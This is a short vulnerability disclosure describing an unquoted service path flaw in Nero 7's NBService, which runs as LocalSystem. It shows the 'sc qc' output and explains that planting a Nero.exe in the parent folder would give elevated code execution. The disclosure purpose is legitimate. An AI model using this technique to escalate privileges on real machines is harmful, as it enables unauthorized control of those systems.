# Exploit Title: Nero 7 Unquoted Service Path Elevation Of Privilege # Disclosure Date: 09/11/2016 # Exploit Author: Boumediene KADDOUR a.k.a Sh311c0d3r # http://www.realistic-security.org # Version: Nero version 7.10.1.0 # Tested on: Windows 7 integral edition FR # CVE : N/A Vulnerability Details: ===================== The nero 7 suffers from an unquoted search path issue impacting the service "NBService" leading to arbitrary code execution, this could potentially allow an authorized unprivileged user to invoke a malicious peice of code with elevated privileges. A successful exploit requires a local user to put its own code in the path of the vulnerable application where it could potentially be executed during the software startup or system reboot. PoC -- [PentestingSkills.BlackBox] a$? sc qc NBService [SC] QueryServiceConfig rA(c)ussite(s) SERVICE_NAME: NBService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Nero\Nero 7\Nero BackItUp\NBService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : NBService DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem notice the path C:\Program Files (x86)\Nero\Nero 7\Nero BackItUp\NBService.exe unquoted !! a malicious local user could put in place its own executable as Nero.exe under C:\Program Files (x86)\Nero\ to be then executed once the application starts up or the system reboots. sh311c0d3r